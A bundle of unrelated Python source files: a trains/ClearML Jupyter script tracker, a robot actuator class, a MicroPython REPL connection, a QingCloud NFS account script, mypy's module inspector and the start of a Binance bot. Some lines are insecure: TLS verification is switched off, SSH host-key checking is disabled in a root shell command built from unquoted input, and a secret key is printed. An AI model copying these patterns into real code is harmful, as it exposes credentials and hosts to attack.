requirements_txt += '{0}\n'.format(k)
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
return requirements_txt, conda_requirements
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
@classmethod
def observer(cls, jupyter_notebook_filename):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from trains import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
# noinspection PyBroadException
try:
get_ipython().run_line_magic('notebook', local_jupyter_filename)
except Exception as ex:
continue
# get notebook python script
script_code, resources = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code)
if prev_script_hash and prev_script_hash == current_script_hash:
continue
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
fmodules, _ = file_import_modules(notebook.parts[-1], script_code)
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
installed_pkgs = get_installed_pkgs_detail()
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
task._update_script(script=data_script)
# update requirements
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep+'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
try:
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
r.raise_for_status()
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = notebook_name
local_ipynb_file = None
else:
# always a forward slash, because this comes from a uri (so never a backslash, not even on windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _get_working_dir(cls, repo_root):
repo_root = Path(repo_root).absolute()
try:
return Path.cwd().relative_to(repo_root).as_posix()
except ValueError:
# Working directory not under repository root
return os.path.curdir
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepath, check_uncommitted=True, create_requirements=True, log=None):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
script_path = Path(os.path.normpath(jupyter_filepath)).absolute()
else:
script_path = Path(os.path.normpath(filepath)).absolute()
if not script_path.is_file():
raise ScriptInfoError(
"Script file [{}] could not be found".format(filepath)
)
script_dir = script_path.parent
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
if not plugin:
if log:
    log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(str(script_dir), include_diff=check_uncommitted)
except Exception as ex:
_log("no info for {} ({})", script_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", script_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
)
messages = []
if repo_info.modified:
messages.append(
"======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
script_info.get("repository", "")
)
)
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages),
script_requirements)
@classmethod
def get(cls, filepath=sys.argv[0], check_uncommitted=True, create_requirements=True, log=None):
try:
return cls._get_script_info(
filepath=filepath, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
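# ---------------------------------------------------------------------------
# Rough usage sketch (commented out, not part of the module): ScriptInfo.get()
# returns a ScriptInfoResult plus a ScriptRequirements helper; the keys used
# below follow the dict built in _get_script_info() above.
#
# result, script_requirements = ScriptInfo.get(filepath=sys.argv[0])
# if result.script:
#     print(result.script['repository'], result.script['entry_point'])
# for warning in result.warning_messages:
#     print(warning)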
|
actuator.py
|
# MIT License
#
# Copyright (c) 2021 Mobotx
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import time
import grpc
from .asset import Asset
class Actuator(Asset):
def __init__(self, logger, connection):
super().__init__(logger, connection)
self._available = False
self.__cmd = None
self.__lock = threading.Lock()
self.__new_cmd_lock = threading.Lock()
self.__new_cmd_lock.acquire()
self.__enabled = False
def _actuator_cmd_stream(self, metadata, context):
if self._is_body(context) and self.__enabled:
self.__lock.acquire()
self._set_metadata(metadata)
self._available = True
is_available_thread = threading.Thread(
target=self.__poll_is_available, args=(context,)
)
is_available_thread.start()
try:
while True:
self.__lock.acquire()
if self._available:
yield self.__cmd
if self.__new_cmd_lock.locked():
self.__new_cmd_lock.release()
else:
raise grpc.RpcError
except grpc.RpcError:
self._available = False
self.__cmd = None
self._reset_metadata()
self.__lock.release()
else:
context.cancel()
def __poll_is_available(self, context):
while context.is_active():
time.sleep(0.1)
self._available = False
self.__lock.release()
def _new_cmd(self, cmd, blocking=False):
if self.__lock.locked():
self.__cmd = cmd
if blocking:
self.__lock.release()
self.__new_cmd_lock.acquire()
else:
self.__lock.release()
def enable(self):
self.__enabled = True
def _is_enabled(self):
return self.__enabled
def _wait_until_available(self):
while not self._available:
time.sleep(0.1)
if not self._connection.attach_brain_iterator.is_active():
return False
return True
def _set_metadata(self, metadata):
pass
def _reset_metadata(self):
pass
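# ---------------------------------------------------------------------------
# Illustrative sketch (commented out, not from the Mobotx codebase): a concrete
# actuator is expected to translate user-facing calls into command messages and
# hand them to _new_cmd(). The wheel_pb2.WheelCmd message below is hypothetical.
#
# class Wheel(Actuator):
#     def set_velocity(self, linear, angular, blocking=False):
#         if not self._is_enabled():
#             return
#         cmd = wheel_pb2.WheelCmd(linear=linear, angular=angular)  # hypothetical
#         self._new_cmd(cmd, blocking=blocking)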
|
connection.py
|
import time
import re
from threading import Lock, Thread
from src.utility.exceptions import OperationError
class Connection:
def __init__(self, terminal=None):
self._terminal = terminal
self._reader_running = False
self._auto_read_enabled = True
self._auto_reader_lock = Lock()
def is_connected(self):
raise NotImplementedError()
def disconnect(self):
raise NotImplementedError()
def read_line(self):
raise NotImplementedError()
def read_all(self):
raise NotImplementedError()
def read_junk(self):
self.read_all()
def read_one_byte(self):
raise NotImplementedError()
def read_to_next_prompt(self, timeout=5.0):
ret = b""
t_start = time.time()
while len(ret) < 4 or ret[-4:] != b">>> ":
if (time.time() - t_start) >= timeout:
raise TimeoutError()
ret += self.read_one_byte()
return ret.decode("utf-8", errors="replace")
def send_line(self, line_text, ending="\r\n"):
raise NotImplementedError()
def send_character(self, char):
raise NotImplementedError()
def send_bytes(self, binary):
raise NotImplementedError()
def send_block(self, text):
lines = text.split("\n")
if len(lines) == 1:
self.send_line(lines[0])
elif len(lines) > 1:
self.send_start_paste()
for line in lines:
self.send_line(line)
self.send_end_paste()
def run_file(self, file_name, globals_init=""):
self.send_start_paste()
if globals_init:
self.send_line(globals_init, "\r")
self.send_line("with open(\"{}\") as f:".format(file_name))
self.send_line(" exec(f.read(), globals())")
self.send_end_paste()
def remove_file(self, file_name):
success = True
# Prevent echo
self._auto_reader_lock.acquire()
self._auto_read_enabled = False
self.send_line("import os; os.remove(\"{}\")".format(file_name))
try:
self.read_to_next_prompt()
except TimeoutError:
success = False
self._auto_read_enabled = True
self._auto_reader_lock.release()
if not success:
raise OperationError()
def get_file_size(self, file_name):
success = True
file_size = 0
self._auto_reader_lock.acquire()
self._auto_read_enabled = False
self.send_line("import os; os.stat(\"{}\")".format(file_name))
try:
res = self.read_to_next_prompt()
# Skip first line which is command echo
res = res[res.find("\n"):]
# Strip parentheses and split to items
items = res.strip("()\r\n ").split(", ")
# st_size is at index 6 of the os.stat() result
file_size = int(items[6])
except TimeoutError:
success = False
self._auto_read_enabled = True
self._auto_reader_lock.release()
if not success:
raise OperationError()
return file_size
def send_start_paste(self):
self.send_character("\5")
def send_end_paste(self):
self.send_character("\4")
def send_kill(self):
self.send_character("\3")
def _reader_thread_routine(self):
self._reader_running = True
while self._reader_running:
self._auto_reader_lock.acquire()
x = ""
if self._auto_read_enabled:
x = self.read_line()
self._auto_reader_lock.release()
time.sleep(0.1 if not x else 0)
@staticmethod
def _get_remote_file_name(local_file_path):
return local_file_path.rsplit("/", 1)[1]
def list_files(self):
success = True
# Pause autoreader so we can receive response
self._auto_reader_lock.acquire()
self._auto_read_enabled = False
# Stop any running script
self.send_kill()
# Read any leftovers
self.read_junk()
# Mark the start of file listing communication
self.send_line("print('#fs#')")
# Now we either wait for any running program to finish
# or read output that it might be producing until it finally
# closes and our command gets executed.
ret = ""
while "#fs#" not in ret:
try:
ret = self.read_to_next_prompt()
except TimeoutError:
success = False
# Now we can be sure that we are ready for listing files
# Send command for listing files
if success:
self.send_line("import os; os.listdir()")
# Wait for reply
try:
ret = self.read_to_next_prompt()
except TimeoutError:
success = False
self._auto_read_enabled = True
self._auto_reader_lock.release()
if success and ret:
return re.findall("'([^']+)'", ret)
else:
raise OperationError()
def _write_file_job(self, remote_name, content, transfer):
raise NotImplementedError()
def write_file(self, file_name, text, transfer):
job_thread = Thread(target=self._write_file_job,
args=(file_name, text, transfer))
job_thread.daemon = True
job_thread.start()
def _write_files_job(self, local_file_paths, transfer):
for local_path in local_file_paths:
remote_name = self._get_remote_file_name(local_path)
with open(local_path, "rb") as f:
content = f.read()
self._write_file_job(remote_name, content, transfer)
if transfer.cancel_scheduled:
transfer.confirm_cancel()
if transfer.error or transfer.cancelled:
break
def write_files(self, local_file_paths, transfer):
job_thread = Thread(target=self._write_files_job,
args=(local_file_paths, transfer))
job_thread.daemon = True
job_thread.start()
def _read_file_job(self, file_name, transfer):
raise NotImplementedError()
def read_file(self, file_name, transfer):
job_thread = Thread(target=self._read_file_job, args=(file_name, transfer))
job_thread.daemon = True
job_thread.start()
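# ---------------------------------------------------------------------------
# Illustrative sketch: send_block() above frames multi-line code with the
# MicroPython REPL paste-mode control characters (Ctrl-E, i.e. \x05, to enter
# and Ctrl-D, i.e. \x04, to execute). A standalone helper that builds the same
# byte stream a concrete Connection subclass would end up sending:
def build_paste_mode_payload(text, ending="\r\n"):
    lines = text.split("\n")
    if len(lines) == 1:
        return (lines[0] + ending).encode("utf-8")
    body = "".join(line + ending for line in lines)
    return b"\x05" + body.encode("utf-8") + b"\x04"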
|
create_s2_account_vdi_host.py
|
#!/usr/bin/env python
#coding:utf-8
'''
Created on 2019-03-05
@author: yunify
'''
import qingcloud.iaas
import threading
import time
from optparse import OptionParser
import sys
import os
import qingcloud.iaas.constants as const
import common.common as Common
def get_s2server_ip(conn,user_id,s2_servers_id):
print("get_s2server_ip user_id == %s s2_servers_id == %s" %(user_id,s2_servers_id))
private_ip = None
if s2_servers_id and not isinstance(s2_servers_id, list):
s2_servers_id = [s2_servers_id]
print("s2_servers_id == %s" % (s2_servers_id))
# DescribeS2Servers
action = const.ACTION_DESCRIBE_S2_SERVERS
print("action == %s" % (action))
ret = conn.describe_s2_servers(owner=user_id,s2_servers=s2_servers_id,verbose=1)
print("describe_s2_servers ret == %s" % (ret))
Common.check_ret_code(ret, action)
# get private_ip
s2_server_set = ret['s2_server_set']
if s2_server_set is None or len(s2_server_set) == 0:
print("describe_s2_servers s2_server_set is None")
exit(-1)
for s2_server in s2_server_set:
private_ip = s2_server.get("private_ip")
return private_ip
def update_s2_servers(conn,user_id,s2_servers_id):
print("update_s2_servers user_id == %s s2_servers_id == %s" %(user_id,s2_servers_id))
if s2_servers_id and not isinstance(s2_servers_id, list):
s2_servers_id = [s2_servers_id]
print("s2_servers_id == %s" % (s2_servers_id))
# UpdateS2Servers
action = const.ACTION_UPDATE_S2_SERVERS
print("action == %s" % (action))
ret = conn.update_s2_servers(owner=user_id,s2_servers=s2_servers_id)
print("update_s2_servers ret == %s" % (ret))
Common.check_ret_code(ret, action)
job_id = ret['job_id']
print("job_id == %s" % (job_id))
# check job status
num = 0
while num < 300:
num = num + 1
print("num == %d" % (num))
time.sleep(1)
status = Common.get_job_status(conn, job_id)
if status == "successful":
print("update_s2_servers successful")
break
print("status == %s" % (status))
# # Result is written to file
# if status == "successful":
# print("update_s2_servers s2_servers successful")
# # write s2server_ip to a file
# s2server_ip_conf = "/opt/s2server_ip_conf"
# s2server_ip = get_s2server_ip(conn,user_id,s2_servers_id)
# print("get_s2server_ip s2server_ip == %s" %(s2server_ip))
# if s2server_ip:
# with open(s2server_ip_conf, "w+") as f1:
# f1.write("S2SERVER_ADDRESS %s" %(s2server_ip))
print("子线程结束")
return None
def create_s2_account_vdi_host(conn,user_id,g_vdi_ip_list):
print("create_s2_account_vdi_host user_id == %s g_vdi_ip_list == %s" %(user_id,g_vdi_ip_list))
if g_vdi_ip_list and not isinstance(g_vdi_ip_list, list):
g_vdi_ip_list = [g_vdi_ip_list]
print("g_vdi_ip_list == %s" % (g_vdi_ip_list))
s2_account_id_list = []
for vdi_ip in g_vdi_ip_list:
print("vdi_ip == %s" %(vdi_ip))
# DescribeS2Groups
action = const.ACTION_DESCRIBE_S2_GROUPS
print("action == %s" % (action))
ret = conn.describe_s2_groups(owner=user_id,offset=0,limit=1,verbose=1,group_types=['NFS_GROUP'])
Common.check_ret_code(ret, action)
# get s2_group_id
s2_group_set = ret['s2_group_set']
if s2_group_set is None or len(s2_group_set) == 0:
print("describe_s2_groups s2_group_set is None")
exit(-1)
for s2_group in s2_group_set:
s2_group_id = s2_group.get("group_id")
print("s2_group_id == %s" % (s2_group_id))
# CreateS2Account
action = const.ACTION_CREATE_S2_ACCOUNT
print("action == %s" % (action))
s2_groups_list = [{"group_id":s2_group_id,"rw_flag":"rw"}]
print("s2_groups_list == %s" % (s2_groups_list))
ret = conn.create_s2_account(owner=user_id,account_name='vdi-portal-account',account_type='NFS',nfs_ipaddr=vdi_ip,s2_group=s2_group_id,opt_parameters='squash=no_root_squash,sync=sync',s2_groups=s2_groups_list)
ret_code = ret.get("ret_code")
if ret_code != 0:
print("%s failed" % (action))
continue
# get s2_account_id
s2_account_id = ret.get("s2_account_id")
if s2_account_id not in s2_account_id_list:
s2_account_id_list.append(s2_account_id)
print("s2_account_id_list == %s" % (s2_account_id_list))
return None
if __name__ == "__main__":
print("主线程启动")
# Parse command-line arguments
opt_parser = OptionParser()
opt_parser.add_option("-z", "--zone_id", action="store", type="string", \
dest="zone_id", help='zone id', default="")
opt_parser.add_option("-a", "--access_key_id", action="store", type="string", \
dest="access_key_id", help='access key id', default="")
opt_parser.add_option("-s", "--secret_access_key", action="store", type="string", \
dest="secret_access_key", help='secret access key', default="")
opt_parser.add_option("-H", "--host", action="store", type="string", \
dest="host", help='host', default="")
opt_parser.add_option("-p", "--port", action="store", type="string", \
dest="port", help='port', default="")
opt_parser.add_option("-P", "--protocol", action="store", type="string", \
dest="protocol", help='protocol', default="")
opt_parser.add_option("-i", "--s2_server_id", action="store", type="string", \
dest="s2_server_id", help='s2_server_id', default="")
opt_parser.add_option("-d", "--vdi_ips", action="store", type="string", \
dest="vdi_ips", help='vdi ips', default="")
(options, _) = opt_parser.parse_args(sys.argv)
zone_id = options.zone_id
access_key_id = options.access_key_id
secret_access_key = options.secret_access_key
host = options.host
port = options.port
protocol = options.protocol
s2_server_id = options.s2_server_id
vdi_ips = Common.explode_array(options.vdi_ips or "")
print("zone_id:%s" % (zone_id))
print("access_key_id:%s" % (access_key_id))
print("secret_access_key:%s" % (secret_access_key))
print("host:%s" % (host))
print("port:%s" % (port))
print("protocol:%s" % (protocol))
print("s2_server_id:%s" % (s2_server_id))
print("vdi_ips:%s" % (vdi_ips))
# Connect to the IaaS backend
conn = Common.connect_iaas(zone_id, access_key_id, secret_access_key, host,port,protocol)
print("connect_iaas conn == %s" % (conn))
# Get the account (user) ID
user_id = Common.get_user_id(conn,access_key_id)
print("get_user_id user_id == %s" % (user_id))
# Start a child thread: create the vNAS access account for the VDI clients
t3 = threading.Thread(target=create_s2_account_vdi_host,args=(conn,user_id,vdi_ips,))
t3.start()
t3.join()
# Before modifying, disabling or deleting a shared-storage target, stop all client access to it and umount it on the clients first, otherwise the clients may stop responding.
for vdi_ip in vdi_ips:
print("vdi_ip == %s" %(vdi_ip))
os.system('ssh -o StrictHostKeyChecking=no root@%s "umount /mnt/nasdata"' % (vdi_ip))
# Start a child thread: update the shared-storage server configuration
t4 = threading.Thread(target=update_s2_servers,args=(conn,user_id,s2_server_id,))
t4.start()
t4.join()
print("主线程结束")
|
moduleinspect.py
|
"""Basic introspection of modules."""
from typing import List, Optional, Union
from types import ModuleType
from multiprocessing import Process, Queue
import importlib
import inspect
import os
import pkgutil
import queue
import sys
class ModuleProperties:
def __init__(
self,
name: str,
file: Optional[str],
path: Optional[List[str]],
all: Optional[List[str]],
is_c_module: bool,
subpackages: List[str],
) -> None:
self.name = name # __name__ attribute
self.file = file # __file__ attribute
self.path = path # __path__ attribute
self.all = all # __all__ attribute
self.is_c_module = is_c_module
self.subpackages = subpackages
def is_c_module(module: ModuleType) -> bool:
if module.__dict__.get("__file__") is None:
# Could be a namespace package. These must be handled through
# introspection, since there is no source file.
return True
return os.path.splitext(module.__dict__["__file__"])[-1] in [".so", ".pyd"]
class InspectError(Exception):
pass
def get_package_properties(package_id: str) -> ModuleProperties:
"""Use runtime introspection to get information about a module/package."""
try:
package = importlib.import_module(package_id)
except BaseException as e:
raise InspectError(str(e))
name = getattr(package, "__name__", None)
file = getattr(package, "__file__", None)
path = getattr(package, "__path__", None) # type: Optional[List[str]]
if not isinstance(path, list):
path = None
pkg_all = getattr(package, "__all__", None)
if pkg_all is not None:
try:
pkg_all = list(pkg_all)
except Exception:
pkg_all = None
is_c = is_c_module(package)
if path is None:
# Object has no path; this means it's either a module inside a package
# (and thus no sub-packages), or it could be a C extension package.
if is_c:
# This is a C extension module, now get the list of all sub-packages
# using the inspect module
subpackages = [
package.__name__ + "." + name
for name, val in inspect.getmembers(package)
if inspect.ismodule(val)
and val.__name__ == package.__name__ + "." + name
]
else:
# It's a module inside a package. There's nothing else to walk/yield.
subpackages = []
else:
all_packages = pkgutil.walk_packages(
path, prefix=package.__name__ + ".", onerror=lambda r: None
)
subpackages = [
qualified_name for importer, qualified_name, ispkg in all_packages
]
return ModuleProperties(
name=name,
file=file,
path=path,
all=pkg_all,
is_c_module=is_c,
subpackages=subpackages,
)
def worker(
tasks: "Queue[str]",
results: "Queue[Union[str, ModuleProperties]]",
sys_path: List[str],
) -> None:
"""The main loop of a worker introspection process."""
sys.path = sys_path
while True:
mod = tasks.get()
try:
prop = get_package_properties(mod)
except InspectError as e:
results.put(str(e))
continue
results.put(prop)
class ModuleInspect:
"""Perform runtime introspection of modules in a separate process.
Reuse the process for multiple modules for efficiency. However, if there is an
error, retry using a fresh process to avoid cross-contamination of state between
modules.
We use a separate process to isolate us from many side effects. For example, the
import of a module may kill the current process, and we want to recover from that.
Always use in a with statement for proper clean-up:
with ModuleInspect() as m:
p = m.get_package_properties('urllib.parse')
"""
def __init__(self) -> None:
self._start()
def _start(self) -> None:
self.tasks = Queue() # type: Queue[str]
self.results = Queue() # type: Queue[Union[ModuleProperties, str]]
self.proc = Process(target=worker, args=(self.tasks, self.results, sys.path))
self.proc.start()
self.counter = 0 # Number of successful roundtrips
def close(self) -> None:
"""Free any resources used."""
self.proc.terminate()
def get_package_properties(self, package_id: str) -> ModuleProperties:
"""Return some properties of a module/package using runtime introspection.
Raise InspectError if the target couldn't be imported.
"""
self.tasks.put(package_id)
res = self._get_from_queue()
if res is None:
# The process died; recover and report error.
self._start()
raise InspectError("Process died when importing %r" % package_id)
if isinstance(res, str):
# Error importing module
if self.counter > 0:
# Also try with a fresh process. Maybe one of the previous imports has
# corrupted some global state.
self.close()
self._start()
return self.get_package_properties(package_id)
raise InspectError(res)
self.counter += 1
return res
def _get_from_queue(self) -> Union[ModuleProperties, str, None]:
"""Get value from the queue.
Return the value read from the queue, or None if the process unexpectedly died.
"""
max_iter = 100
n = 0
while True:
if n == max_iter:
raise RuntimeError("Timeout waiting for subprocess")
try:
return self.results.get(timeout=0.05)
except queue.Empty:
if not self.proc.is_alive():
return None
n += 1
def __enter__(self) -> "ModuleInspect":
return self
def __exit__(self, *args: object) -> None:
self.close()
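# ---------------------------------------------------------------------------
# Illustrative usage sketch, following the class docstring above:
def _demo_module_inspect(package_id="urllib.parse"):
    with ModuleInspect() as m:
        props = m.get_package_properties(package_id)
        # e.g. props.is_c_module, props.file, props.subpackages
        return props.name, props.subpackages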
|
Binance_Detect_Moonings.py
|
"""
Horacio Oscar Fanelli - Pantersxx3
Version: 6.2
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repository should be
construed as investment advice. Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
See requirements.txt for versions of modules needed
Notes:
- Requires Python version 3.9.x to run
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
#for clear screen console
from os import system, name
# used for math functions
import math
# used to create threads & dynamic loading of modules
import threading
import multiprocessing
import importlib
# used for directory handling
import glob
#discord needs import request
import requests
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
from requests.exceptions import ReadTimeout, ConnectionError
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
#print output tables
from prettytable import PrettyTable, from_html_one
#from pretty_html_table import build_table
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_discord_creds
)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[94m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
BORDER = '\033[33m'
DEFAULT = '\033[39m'
BOT_LOSSES = '\033[91m'
BOT_WINS = '\033[92m'
RED = '\033[91m'
#Blue = '\033[94m'
#Cyan = '\033[96m'
MENUOPTION = '\033[97m'
#Magenta = '\033[95m'
#Grey = '\033[90m'
#Black = '\033[90m'
# tracks profit/loss each session
